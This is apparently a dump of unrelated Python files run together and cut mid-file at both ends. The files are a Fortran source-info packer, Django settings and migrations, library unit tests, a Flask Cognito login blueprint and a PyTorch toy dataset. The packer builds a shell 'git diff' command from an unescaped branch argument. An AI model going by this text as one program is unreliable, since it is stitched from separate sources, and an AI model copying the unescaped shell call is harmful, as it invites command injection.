True except: got_argparse = False def str2bool(x): if x.lower() not in ['true', 'yes', '1', 'false', 'no', '0']: raise TypeError("Argument is not a Boolean string") return x.lower() in ['true', 'yes', '1'] def stripped(s): try: # python 2 s = unicode(s, 'ascii', 'ignore') except(NameError): # python 3 s = s.encode('ascii', 'ignore').decode() return s.strip() if got_argparse: argp = argparse.ArgumentParser( description="Pack source code for writing to SDF output") argp.add_argument("prefix", type=str, help="Package name") argp.add_argument("pack_source_code", type=str2bool, help="Pack source code") argp.add_argument("pack_git_diff", type=str2bool, help="Pack git diff") argp.add_argument("pack_git_diff_from_origin", type=str2bool, help="Pack git diff from origin") argp.add_argument("generate_checksum", type=str2bool, help="Generate checksum") argp.add_argument("f77_output", type=str2bool, help="Fortran 77 output") argp.add_argument("outfile", type=str, help="Output file") argp.add_argument("compiler_info", type=stripped, help="Compiler info") argp.add_argument("compiler_flags", type=stripped, help="Compiler flags") argp.add_argument("filelist", type=str, nargs='*', help="Source files") argp.add_argument("--diff-branch", type=str, default="origin/main", help="Git branch to compare differences") args = argp.parse_args() else: args = type("", (), dict(dummy=1))() args.prefix = sys.argv[2] (args.pack_source_code, args.pack_git_diff, args.pack_git_diff_from_origin, args.generate_checksum, args.f77_output,) = map(str2bool, sys.argv[3:8]) args.outfile = sys.argv[8] (args.compiler_info, args.compiler_flags,) = map(stripped, sys.argv[9:11]) args.filelist = sys.argv[11:] args.diff_branch = "origin/main" prefix = args.prefix pack_source_code = args.pack_source_code pack_git_diff = args.pack_git_diff pack_git_diff_from_origin = args.pack_git_diff_from_origin generate_checksum = args.generate_checksum commitfile = os.path.join(os.environ['GIT_WORK_TREE'], 'src', 'COMMIT') archive = "source_info_archive.tgz" hexdump = "source_info_hexdump.txt" gitdiff = "source_info_gitdiff.txt" varname = "%s_bytes" % prefix diffname = "%s_diff_bytes" % prefix module_name = "%s_source_info" % prefix outfile = args.outfile incfile = os.path.splitext(outfile)[0] + '_include.inc' f77_output = args.f77_output nbytes = 8 nelements = 0 padding = 0 vname = varname if f77_output: inc_handle = open(incfile, "w") linestart = 6*' ' linecont = 5*' '+'&' suffix = '' ncolumns = 72 ncontinuation = 19 else: linestart = '' linecont = '' suffix = '&' ncolumns = 132 # gfortran ignores the F90 standard of 139 ncontinuation = 39 def byteswap4(s): s = binascii.unhexlify(s) a, = struct.unpack('>L', s) s = struct.pack('Q', s) s = struct.pack(' ncolumns): of.write(ostring[:ncolumns]+'\n') ostring = linecont + ostring[ncolumns:] rem = len(ostring) else: while (rem > ncolumns): of.write(ostring[:ncolumns-1]+'&\n') ostring = '&' + ostring[ncolumns-1:] rem = len(ostring) if rem > 0: of.write(ostring) of.write('\n') def print_character(name, value): global vname, of # ilen = len(value) ilen = 256 var = "%s_%s" % (vname, name) if f77_output: of = inc_handle wrapped("CHARACTER*%i %s" % (ilen, var)) wrapped("COMMON/c_%s/%s" % (vname, var)) of = out_handle wrapped("CHARACTER*%i %s" % (ilen, var)) wrapped("COMMON/c_%s/%s" % (vname, var)) wrapped("DATA %s/'%s'/" % (var, value)) else: ilen = len(value) if ilen == 0: ilen = 1 wrapped("CHARACTER(LEN=%i) :: %s = '%s'" % (ilen, var, value)) def print_integer(name, value): global vname, of var = "%s_%s" % (vname, name) if f77_output: of = inc_handle wrapped("INTEGER " + var) wrapped("COMMON/i_%s/%s" % (vname, var)) of = out_handle wrapped("INTEGER " + var) wrapped("COMMON/i_%s/%s" % (vname, var)) wrapped("DATA %s/%i/" % (var, value)) else: wrapped("INTEGER, PARAMETER :: %s = %i" % (var, value)) def get_bytes_checksum(files): global checksum_type if not generate_checksum: checksum_type = '' return '' cksum = hashlib.new('sha256') for name in files: f = open(name) while True: data = f.read(cksum.block_size) if not data: break cksum.update(data.encode('utf-8')) checksum_type = 'sha256' return cksum.hexdigest() def write_data_bytes(filename, varname): global mimetype, of global linestart, linecont, suffix, ncolumns, ncontinuation f = open(filename, 'rb') d = f.read() dhex = codecs.encode(d, 'hex_codec').decode('utf-8') f.close() os.remove(filename) nelements = (len(d)+nbytes-1) // nbytes padding = nelements * nbytes - len(d) dhex += '00' * padding print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', nelements) print_integer_array(nelements) nwidth = len("z'',") + 2 * nbytes nper_line_body = (ncolumns - 1) // nwidth sdata = linestart + "DATA(%s(i),i=%i,%i)/" % (varname, nelements, nelements) nper_line_first = (ncolumns - len(sdata) - 1) // nwidth nper_segment = nper_line_first + nper_line_body * ncontinuation i0 = 0 segline = 0 elements_written = 0 while elements_written < nelements: ss = "" if segline == 0: i1 = min(i0 + nper_segment, nelements) ss += linestart + "DATA(%s(i),i=%i,%i)/" % (varname, i0+1, i1) i0 = i1 else: ss += linecont shex = dhex[2*nbytes*elements_written:2*nbytes*(elements_written+1)] shex = byteswap(nbytes, shex) ss += "z'%s'" % shex elements_written = elements_written + 1 if segline == 0: nper_line = nper_line_first - 1 else: nper_line = nper_line_body - 1 n = 0 while n < nper_line and elements_written != nelements: shex = dhex[2*nbytes*elements_written: 2*nbytes*(elements_written+1)] shex = byteswap(nbytes, shex) ss += ",z'%s'" % shex elements_written = elements_written + 1 n = n + 1 if elements_written == nelements or segline == ncontinuation: ss += "/\n" else: ss += "," + suffix + "\n" of.write(ss) if segline == ncontinuation: segline = 0 else: segline = segline + 1 def print_integer_array(value): global of, nbytes, vname if value == 0: value = 1 if f77_output: of = inc_handle wrapped("INTEGER*%i %s(%s_len)" % (nbytes, vname, vname)) of = out_handle wrapped("INTEGER*%i %s(%i)" % (nbytes, vname, value)) else: wrapped("INTEGER(%i) :: %s(%i)" % (nbytes, vname, value)) try: cmd = sp.Popen("git describe --always --long --dirty", shell=True, stderr=sp.PIPE, stdout=sp.PIPE) output = cmd.communicate() if cmd.returncode == 127: print('WARNING: Git command not found') git_version = '' pack_git_diff = False try: f = open(commitfile, "r") string = f.readline().rstrip('\n') f.close() git_version = string.split('=')[1].replace('"', '') except: pass elif cmd.returncode != 0 and str(output[1]).find('ot a git repo') != -1: print('WARNING: Not a git repository') git_version = '' pack_git_diff = False try: f = open(commitfile, "r") string = f.readline().rstrip('\n') f.close() git_version = string.split('=')[1].replace('"', '') except: pass elif cmd.returncode != 0: raise Exception('ERROR: unable to generate git diff') else: git_version = output[0].decode('utf-8').rstrip() pack_git_diff = True except: raise Exception('ERROR: unable to generate git diff') tsec = time.time() compile_date = int(round(tsec)) compile_date_string = time.strftime("%Y-%m-%d-%H:%M:%S", time.localtime(tsec)) compile_machine_info = ' '.join((platform.node(), platform.platform())) compiler_info = args.compiler_info compiler_flags = args.compiler_flags # fnull=open(os.devnull,'w') # filelist = sp.check_output("git ls-files --cached --no-empty-directory " # + "--full-name", shell=True, # stderr=fnull).rstrip() filelist = args.filelist if filelist == []: pack_source_code = False # Now write the file out_handle = open(outfile, "w") of = out_handle if f77_output: of.write(linestart + "SUBROUTINE %s_source_info\n" % module_name) else: of.write(linestart + "MODULE %s\n\n" % module_name) of.write(linestart + "IMPLICIT NONE\n\n") print_character('git_version', git_version) print_character('compile_date_string', compile_date_string) print_character('compile_machine_info', compile_machine_info) print_character('compiler_info', compiler_info) print_character('compiler_flags', compiler_flags) print_integer('compile_date', compile_date) if pack_source_code or pack_git_diff: if f77_output: of.write(linestart + "INTEGER i\n\n") else: of.write(linestart + "INTEGER, PRIVATE :: i\n") vname = varname checksum_type = '' checksum = '' if filelist != []: checksum = get_bytes_checksum(filelist) print_character('checksum_type', checksum_type) print_character('checksum', checksum) if not pack_source_code: mimetype = '' print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', 0) print_integer_array(0) else: tar = tarfile.open(archive, "w:gz") for name in filelist: tar.add(name) tar.close() mimetype = 'application/x-tar-gz' write_data_bytes(archive, vname) vname = diffname checksum_type = '' checksum = '' if not pack_git_diff: mimetype = '' print_character('checksum_type', checksum_type) print_character('checksum', checksum) print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', 0) print_integer_array(0) else: if pack_git_diff_from_origin: sp.call(["git diff %s > %s" % (args.diff_branch, gitdiff)], shell=True) else: sp.call(["git diff > %s" % gitdiff], shell=True) if os.path.getsize(gitdiff) != 0: checksum = get_bytes_checksum([gitdiff]) zgitdiff = gitdiff + '.gz' f_in = open(gitdiff, 'rb') f_out = gzip.open(zgitdiff, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(gitdiff) os.rename(zgitdiff, gitdiff) mimetype = 'application/x-gzip' print_character('checksum_type', checksum_type) print_character('checksum', checksum) write_data_bytes(gitdiff, vname) if f77_output: of.write(linestart + "END SUBROUTINE\n") else: of.write("\nEND MODULE %s\n" % module_name) INSTALLED_APPS = [ "examples.dummy_pool", "examples.db_pool", ] # ENTRYPOINTS = "pools.entries" LOGGING = { 'version': 1, 'disable_existing_loggers': False, "handlers": { "console": { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'color' }, "rmq": { 'level': 'DEBUG', 'class': 'python_logging_rabbitmq.RabbitMQHandler', 'host': 'localhost', 'port': 5672, 'username': 'guest', 'password': '', 'exchange': 'log', 'declare_exchange': False, 'connection_params': { 'virtual_host': '/', 'connection_attempts': 3, 'socket_timeout': 5000 }, 'fields': { 'source': 'MainAPI', 'env': 'production' }, 'fields_under_root': True } }, "formatters": { "standard": { "format": "%(levelname)-8s %(asctime)s %(message)s" }, "color": { "()": "fairways.helpers.ColoredFormatterFactory", "format_template": "%(log_color)s%(levelname)-8s%(reset)s %(log_color)s%(message)s", "datefmt": None, "reset": True, "log_colors": { 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'red,bg_white', }, "secondary_log_colors": {}, "style": '%' } }, "loggers": { "": { "handlers": ["console"], "level": "DEBUG", "formatter": "standard" }, "app": { "handlers": ["console"], "level": "DEBUG", "formatter": "color" }, "rmq": { "handlers": ["rmq"] } } } CONNECTIONS = { "db_sqlite_example": ":memory:" }"""Test 4.3.""" import sys sys.path.insert(0, '/Users/zt/programming/interviews/interview-prep/cracking-the-coding-interview/data_structures') from bst import BinarySearchTree, Node # def test_list_of_depths(): # """Test list of depths returns correctly.""" # from CTCI_4_3 import list_of_depths # bst = BinarySearchTree() # bst.root = Node(5) # bst.root.left = Node(3) # bst.root.right = Node(7) # bst.root.left.left = Node(2) # bst.root.left.right = Node(4) # bst.root.right.left = Node(6) # bst.root.right.right = Node(8) # assert list_of_depths(bst) == [[5], [3, 7], [2, 4, 6, 8]] AdirthaBorgohain/Agency-CRMdashboard/urls.py from . import views from django.urls import path urlpatterns = [ path("home", views.index, name="index"), path('analytics', views.analytics, name="analytics"), path('customers', views.customers_agents, name="customers_agents") ]src/main/python/progress1bar/__init__.py from .progressbar import ProgressBar lib_bgp_simulator/tests/yaml_system_tests/non_routed_prefix/test_non_routed_prefix.py from pathlib import Path from ...graphs import Graph006 from ...utils import BaseGraphSystemTester from ....engine_input import NonRoutedPrefixHijack from ....engine import BGPSimpleAS from ....engine import BGPAS from ....engine import ROVSimpleAS from ....engine import ROVAS class BaseNonRoutedPrefixTester(BaseGraphSystemTester): GraphInfoCls = Graph006 EngineInputCls = NonRoutedPrefixHijack base_dir = Path(__file__).parent adopting_asns = (2,) class Test013NonRoutedPrefixROVSimple(BaseNonRoutedPrefixTester): BaseASCls = BGPSimpleAS AdoptASCls = ROVSimpleAS class Test014NonRoutedPrefix2ROV(BaseNonRoutedPrefixTester): BaseASCls = BGPAS AdoptASCls = ROVAS usegalaxy-au/galaxy-media-sitewebapp/home/migrations/0010_notice_is_published.py # Generated by Django 3.2 on 2022-02-15 23:26 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('home', '0009_auto_20220118_0635'), ] operations = [ migrations.AddField( model_name='notice', name='is_published', field=models.BooleanField(default=False, help_text='Unpublished content is visible to admin users only. Use this to review content before release to public users.'), ), ] #!/usr/bin/env python3 # # Copyright (c) 2020 Mobvoi Inc. (authors: ) # # See ../../../LICENSE for clarification regarding multiple authors # To run this single test, use # # ctest --verbose -R fsa_test_py -E host import unittest import k2 import torch def _remove_leading_spaces(s: str) -> str: lines = [line.strip() for line in s.split('\n') if line.strip()] return '\n'.join(lines) class TestFsa(unittest.TestCase): def test_acceptor_from_str(self): s = ''' 0 1 2 -1.2 0 2 10 -2.2 1 6 -1 -3.2 1 3 3 -4.2 2 6 -1 -5.2 2 4 2 -6.2 3 6 -1 -7.2 5 0 1 -8.2 6 ''' fsa = k2.Fsa(_remove_leading_spaces(s)) expected_str = ''' 0 1 2 -1.2 0 2 10 -2.2 1 6 -1 -3.2 1 3 3 -4.2 2 6 -1 -5.2 2 4 2 -6.2 3 6 -1 -7.2 5 0 1 -8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str()) expected_str = ''' 0 1 2 1.2 0 2 10 2.2 1 6 -1 3.2 1 3 3 4.2 2 6 -1 5.2 2 4 2 6.2 3 6 -1 7.2 5 0 1 8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str(openfst=True)) arcs = fsa.arcs assert isinstance(arcs, torch.Tensor) assert arcs.dtype == torch.int32 assert arcs.device.type == 'cpu' assert arcs.shape == (8, 3), 'there should be 8 arcs' assert torch.allclose(arcs[0], torch.tensor([0, 1, 2], dtype=torch.int32)) assert torch.allclose( fsa.weights, torch.tensor([-1.2, -2.2, -3.2, -4.2, -5.2, -6.2, -7.2, -8.2], dtype=torch.float32)) fsa = fsa.to('cuda') arcs[0][0] += 10 assert arcs[0][0] == 10, 'arcs should still be accessible' arcs = fsa.arcs assert arcs.dtype == torch.int32 assert arcs.device.type == 'cuda' assert arcs.device.index == 0 assert arcs.shape == (8, 3), 'there should be 8 arcs' assert torch.allclose( arcs[1], torch.tensor([0, 2, 10], dtype=torch.int32, device=arcs.device)) def test_transducer_from_str(self): s = ''' 0 1 2 22 -1.2 0 2 10 100 -2.2 1 6 -1 16 -4.2 1 3 3 33 -3.2 2 6 -1 26 -5.2 2 4 2 22 -6.2 3 6 -1 36 -7.2 5 0 1 50 -8.2 6 ''' fsa = k2.Fsa(_remove_leading_spaces(s)) assert fsa.aux_labels.dtype == torch.int32 assert fsa.aux_labels.device.type == 'cpu' assert torch.allclose( fsa.aux_labels, torch.tensor([22, 100, 16, 33, 26, 22, 36, 50], dtype=torch.int32)) expected_str = ''' 0 1 2 22 -1.2 0 2 10 100 -2.2 1 6 -1 16 -4.2 1 3 3 33 -3.2 2 6 -1 26 -5.2 2 4 2 22 -6.2 3 6 -1 36 -7.2 5 0 1 50 -8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str()) expected_str = ''' 0 1 2 22 1.2 0 2 10 100 2.2 1 6 -1 16 4.2 1 3 3 33 3.2 2 6 -1 26 5.2 2 4 2 22 6.2 3 6 -1 36 7.2 5 0 1 50 8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str(openfst=True)) def test_symbol_table_and_dot(self): isym_str = ''' 0 a 1 b 2 c 3 ''' osym_str = ''' 0 x 1 y 2 z 3 ''' isym = k2.SymbolTable.from_str(isym_str) osym = k2.SymbolTable.from_str(osym_str) rules = ''' 0 1 1 1 0.5 0 1 2 2 1.5 1 2 3 3 2.5 2 3 -1 0 3.5 3 ''' fsa = k2.Fsa(_remove_leading_spaces(rules)) fsa.set_isymbol(isym) fsa.set_osymbol(osym) dot = fsa.to_dot() dot.render('/tmp/fsa', format='pdf') # the fsa is saved to /tmp/fsa.pdf if __name__ == '__main__': unittest.main() #!/usr/bin/env python """ Contains tests for type formatters from the `array.py` module. :file: VectorTests.py :date: 29/08/2015 :authors: - <> """ from .utils import * class ThatStruct(Struct): """ A simple `Struct`. """ data = u16(0x55AA) indicator = u8(0xFA) alignment = u8 class HasArray(Struct): array = u8[4] class VectorTests(HydrasTestCase): """ A testcase for testing types from the `array.py` module. """ def test_typed_array_default_type(self): """ Test the Array's default item type. """ array = u8[3]() self.assertEqual(array.serialize([0] * 3), b'\x00\x00\x00') def test_typed_array_non_default_type(self): """ Test the TypeArray using a scalar value other than the default. """ array = u16[2]() data = [0xDEAF, 0xCAFE] self.assertEqual(array.serialize(data), b'\xAF\xDE\xFE\xCA') def test_typed_array_big_endian(self): """ Test the Array with a multi-byte type in BigEndian. """ array = i16_be[3]() data = [-2, 100, 200] self.assertEqual(array.serialize(data), b'\xFF\xFE\x00\x64\x00\xC8') def test_nested_struct_array(self): """ Test the Array with a Struct type. """ array = ThatStruct[2]() data = [ThatStruct(), ThatStruct()] data[0].indicator = 0 self.assertEqual(array.serialize(data), b'\xAA\x55\x00\x00\xAA\x55\xFA\x00') def test_value_assignments(self): o = HasArray() o.array = b'\x00' * 4 o.array = [0] * 4 o.array = (0, ) * 4 wrong_types = [None, 0, True] for v in wrong_types: with self.assertRaises(TypeError): o.array = v def test_default_value(self): self.assertEqual(u16[2]([1]).default_value, [1]) self.assertEqual(u16[2]([1, 1]).default_value, [1, 1]) with self.assertRaises(ValueError): u16[2]([1, 1, 1]) def test_shorter_value(self): a = HasArray() a.array = [0, 0] self.assertEqual(a.serialize(), b'\00\x00\x00\x00') # Generated by Django 2.2.13 on 2020-07-22 07:37 import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('pipeline', '0037_merge_20200722_0736'), ] operations = [ migrations.CreateModel( name='Hex', fields=[ ('id', models.CharField(max_length=12, primary_key=True, serialize=False)), ('geom', django.contrib.gis.db.models.fields.PolygonField(srid=4326)), ('avail_5_1', models.BooleanField()), ('avail_10_2', models.BooleanField()), ('avail_25_5', models.BooleanField()), ('avail_50_10', models.BooleanField()), ], ), migrations.CreateModel( name='ISP', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=127)), ], ), migrations.CreateModel( name='Service', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hex', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='pipeline.Hex')), ('isp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pipeline.ISP')), ], ), ] from audiomate import annotations from audiomate import tracks from audiomate.corpus.subset import subview import pytest from tests import resources class TestMatchingUtteranceIdxFilter: def test_match(self): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}) assert utt_filter.match(tracks.Utterance('a', 'x'), None) assert utt_filter.match(tracks.Utterance('b', 'x'), None) assert utt_filter.match(tracks.Utterance('d', 'x'), None) assert not utt_filter.match(tracks.Utterance('c', 'x'), None) assert not utt_filter.match(tracks.Utterance('e', 'x'), None) def test_match_inverse(self): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}, inverse=True) assert not utt_filter.match(tracks.Utterance('a', 'x'), None) assert not utt_filter.match(tracks.Utterance('b', 'x'), None) assert not utt_filter.match(tracks.Utterance('d', 'x'), None) assert utt_filter.match(tracks.Utterance('c', 'x'), None) assert utt_filter.match(tracks.Utterance('e', 'x'), None) def test_serialize(self): f = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}) assert f.serialize() == 'include,a,b,d' def test_serialize_inverse(self): f = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}, inverse=True) assert f.serialize() == 'exclude,a,b,d' def test_parse(self): f = subview.MatchingUtteranceIdxFilter.parse('include,a,b,d') assert f.utterance_idxs == {'a', 'b', 'd'} assert not f.inverse def test_parse_inverse(self): f = subview.MatchingUtteranceIdxFilter.parse('exclude,a,b,d') assert f.utterance_idxs == {'a', 'b', 'd'} assert f.inverse @pytest.fixture def utt_without_noise(): utt = tracks.Utterance('utt-1', 'file-1') utt.set_label_list(annotations.LabelList(idx='alpha', labels=[ annotations.Label('music', 0, 5), annotations.Label('speech', 5, 12), annotations.Label('music', 13, 15) ])) utt.set_label_list(annotations.LabelList(idx='bravo', labels=[ annotations.Label('music', 0, 1), annotations.Label('speech', 2, 6) ])) return utt @pytest.fixture def utt_with_noise(): utt = tracks.Utterance('utt-2', 'file-2') utt.set_label_list(annotations.LabelList(idx='alpha', labels=[ annotations.Label('music', 0, 5), annotations.Label('speech', 5, 12), annotations.Label('noise', 13, 15) ])) utt.set_label_list(annotations.LabelList(idx='bravo', labels=[ annotations.Label('music', 0, 1), annotations.Label('speech', 2, 6) ])) return utt class TestMatchingLabelFilter: def test_match_all_label_lists(self, utt_with_noise, utt_without_noise): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}) assert label_filter.match(utt_without_noise, None) assert not label_filter.match(utt_with_noise, None) def test_match_single(self, utt_with_noise, utt_without_noise): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'alpha'}) assert label_filter.match(utt_without_noise, None) assert not label_filter.match(utt_with_noise, None) label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'bravo'}) assert label_filter.match(utt_without_noise, None) assert label_filter.match(utt_with_noise, None) def test_serialize(self): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'alpha'}) assert label_filter.serialize() == 'alpha|||music,speech' def test_serialize_no_label_list_ids(self): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}) assert label_filter.serialize() == '|||music,speech' def test_parse(self): label_filter = subview.MatchingLabelFilter.parse('alpha|||music,speech') assert label_filter.labels == {'music', 'speech'} assert label_filter.label_list_ids == {'alpha'} def test_parse_no_label_list_ids(self): label_filter = subview.MatchingLabelFilter.parse('music,speech') assert label_filter.labels == {'music', 'speech'} assert label_filter.label_list_ids == set() @pytest.fixture def sample_subview(): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'utt-1', 'utt-3'}) corpus = resources.create_dataset() return subview.Subview(corpus, filter_criteria=[utt_filter]) class TestSubview: def test_tracks(self, sample_subview): assert sample_subview.num_tracks == 2 assert 'wav-1' in sample_subview.tracks.keys() assert 'wav_3' in sample_subview.tracks.keys() def test_utterances(self, sample_subview): assert sample_subview.num_utterances == 2 assert 'utt-1' in sample_subview.utterances.keys() assert 'utt-3' in sample_subview.utterances.keys() def test_issuers(self, sample_subview): assert sample_subview.num_issuers == 2 assert 'spk-1' in sample_subview.issuers.keys() assert 'spk-2' in sample_subview.issuers.keys() def test_serialize(self, sample_subview): serialized = sample_subview.serialize() assert serialized == 'matching_utterance_ids\ninclude,utt-1,utt-3' def test_parse(self): corpus = resources.create_dataset() sv = subview.Subview.parse('matching_utterance_ids\ninclude,utt-1,utt-3', corpus=corpus) assert len(sv.filter_criteria) == 1 assert sv.filter_criteria[0].utterance_idxs == {'utt-1', 'utt-3'} def test_utterances_without_issuers(self, sample_subview): sample_subview.corpus.utterances['utt-3'].issuer = None sample_subview.corpus.utterances['utt-4'].issuer = None sample_subview.corpus.utterances['utt-5'].issuer = None assert sample_subview.num_utterances == 2 assert sample_subview.num_issuers == 1 from . import * class GetUserSuggestionsController(AppDevController): def get_path(self): return '/users/suggestions/' def get_methods(self): return ['GET'] @authorize def content(self, **kwargs): user = kwargs.get('user') suggested_users = users_dao.get_suggested_users(user.id, 20) return {'users': [user_schema.dump(u).data for u in suggested_users]} class Solution: def diStringMatch(self, S: str) -> List[int]: lowest = 0 highest = len(S) res = list() for char in S: if char == 'I': res.append(lowest) lowest += 1 else: res.append(highest) highest -= 1 if char == 'I': res.append(lowest) else: res.append(highest) return res from flask import Blueprint from flask import jsonify from flask import redirect from flask import request from flask import url_for from flask_login import current_user from flask_login import login_required from flask_login import login_user from flask_login import logout_user from http import HTTPStatus from models.user import User from shared.cognito import cognito from uuid import uuid4 user_routes = Blueprint('user_routes', __name__) @user_routes.route('/current_user', methods=['GET']) @login_required def get_current_user(): return jsonify(user=current_user.to_json(), success=True) # Cognito will return a ?code=.... arg to this endpoint, which we can exchange for a Cognito JWT @user_routes.route('/oauth/cognito/callback', methods=['GET']) def login_via_cognito_callback(): login_code = request.args.get('code') email = cognito.get_email_from_code( code=login_code, callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) if not email: return jsonify(error="OAuth did not return an email address property.") user = User(email) if user.exists: login_user(user) return redirect('/') else: _user = User(email) _user.email = email _user.id = str(uuid4()) _user.save() login_user(_user) return redirect('/') # Redirect to Cognito OAuth site @user_routes.route('/oauth/cognito/login', methods=['GET']) def oauth_login_redirect(): print(request, flush=True) redirect_url=cognito.cognito_login_url( callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) return redirect(redirect_url) @user_routes.route('/logout', methods=['GET']) def user_logout_view(): logout_user() return redirect('/') # Allow an app to snag an auth token and exchange it for a local JWT @user_routes.route('/jwt/cognito/') def echange_cognito_code_for_jwt(login_code): email = cognito.get_email_from_code( code=login_code, callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) _user = User(email) if _user.exists: return jsonify(jwt=_user.create_jwt(), success=True) else: resp = jsonify(error='No such user found', success=False) resp.status_code = HTTPStatus.NOT_FOUND return respronamit/migl-Rontoy-classification/utils.py import numpy as np import torch.utils.data as utils import torch import torch.nn as nn from bottleneck import Bottleneck import matplotlib.pyplot as plt def create_function(order, max_coef): a = np.random.uniform(-max_coef, max_coef, size=order) b = np.random.uniform(-max_coef, max_coef, size=order) def function(x): function_value = 0 for n in range(len(a)): function_value += a[n] * np.cos((n+1)*x) + b[n] * np.sin((n+1)*x) return function_value return function # def normalize(y): return (y - np.mean(y)) / np.std(y) # fig, ax = plt.subplots(5, 5) # for i in range(5): # for j in range(5): # func = create_function(3, 1) # x = np.linspace(0,2 * np.pi) # # ax[i,j].plot(x, normalize(func(x))) # ax[i,j].plot(x, func(x)) # plt.show() def create_dataset(seed, datapoint_size, number_datapoints_train, number_datapoints_test, num_classes, funcs_per_class, noise_strength, batch_size, size_signal_area, number_start_locations): np.random.seed(seed) functions_train = [[create_function(3,1) for i in range(funcs_per_class)] for j in range(num_classes)] functions_test = [[create_function(3,1) for i in range(funcs_per_class)] for j in range(num_classes)] pattern_x = np.linspace(0, 2*np.pi, size_signal_area) signals = [create_function(3,1)(pattern_x) for i in range(num_classes)] classes_train = np.random.randint(0, num_classes, size=number_datapoints_train) classes_test = np.random.randint(0, num_classes, size=number_datapoints_test) possible_x = np.linspace(0, 2*np.pi, 2000) x = np.array(sorted(np.random.choice(possible_x, datapoint_size, replace=False))) start_locations = np.random.choice(list(range(datapoint_size - size_signal_area)), replace=False, size=number_start_locations) print(start_locations) ys_train = [] ys_test = [] for i in range(number_datapoints_train): func_idx = np.random.randint(0, funcs_per_class) func = functions_train[classes_train[i]][func_idx] y = func(x) + np.random.normal(0, noise_strength, datapoint_size) # start = np.random.randint(0, datapoint_size - size_signal_area) start_idx = np.random.randint(0, number_start_locations) start = start_locations[start_idx] y[start:start+size_signal_area] = signals[classes_train[i]] ys_train.append(y) for i in range(number_datapoints_test): func_idx = np.random.randint(0, funcs_per_class) func = functions_test[classes_test[i]][func_idx] y = func(x) + np.random.normal(0, noise_strength, datapoint_size) # start = np.random.randint(0, datapoint_size - size_signal_area) start_idx = np.random.randint(0, number_start_locations) start = start_locations[start_idx] y[start:start+size_signal_area] = signals[classes_test[i]] ys_test.append(y) train_dataset = utils.TensorDataset(torch.from_numpy(np.array(ys_train)).float(), torch.from_numpy(classes_train).long()) test_dataset = utils.TensorDataset(torch.from_numpy(np.array(ys_test)).float(), torch.from_numpy(classes_test).long()) train_dataloader = utils.DataLoader(train_dataset, batch_size=batch_size, shuffle=True) test_dataloader = utils.DataLoader(test_dataset, batch_size=batch_size, shuffle=True) return train_dataloader, test_dataloader class Squeeze(nn.Module): def __init__(self): super(Squeeze, self).__init__() def forward(self, x): return x.squeeze() class Flatten(nn.Module): def forward(self, input): return input.view(input.size(0), -1) class Net(nn.Module): def __init__(self, vib, data_size, p_dropout, latent_size, num_classes): super(Net, self).__init__() self.vib = vib self.net = nn.Sequential( nn.Conv1d(1, 10, kernel_size=11), nn.ReLU(), Flatten(), nn.Linear((data_size-10)*10, latent_size), nn.Dropout(p_dropout), nn.ReLU(), ) if vib: self.reg_layer = Bottleneck(latent_size, 256) else: self.reg_layer = nn.Linear(latent_size, 256) self.net2 = nn.Sequential( nn.ReLU(), nn.Linear(256, num_classes), ) def forward(self, x): x = x.unsqueeze(1) x = self.net(x) if self.vib: x, kl = self.reg_layer(x) kl = torch.sum(kl, dim=1) # TODO: Find out dimension! else: x = self.reg_layer(x) kl = torch.Tensor([0]) x = self.net2(x).squeeze() return x, kl.mean() tests/test_s3_policy_data.py #!/usr/bin/env python3 # coding: utf-8 import boto3 from botocore.stub import Stubber from wellcomeml.io import s3_policy_data def stubber_responses(stubber, mock_hash_file=None): list_buckets_response = { "Contents": [ { "Key": "good/path/file1.json" }, { "Key": "bad/path/file2.json" } ] } expected_params = {'Bucket': 'datalabs-dev'} stubber.add_response('list_objects_v2', list_buckets_response, expected_params) if mock_hash_file: get_object_response = { "Body": mock_hash_file } expected_params = {'Bucket': 'datalabs-dev', 'Key': 'good/path/file1.json'} stubber.add_response('get_object', get_object_response, expected_params) return stubber def policy_downloader(s3): return s3_policy_data.PolicyDocumentsDownloader( s3=s3, bucket_name="datalabs-dev", dir_path="good/path" ) def test_get_keys(): s3 = boto3.client('s3') stubber = Stubber(s3) stubber = stubber_responses(stubber) with stubber: policy_s3 = policy_downloader(s3) pdf_keys = policy_s3.pdf_keys assert pdf_keys == ['good/path/file1.json'] def test_get_hashes_with_word(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = 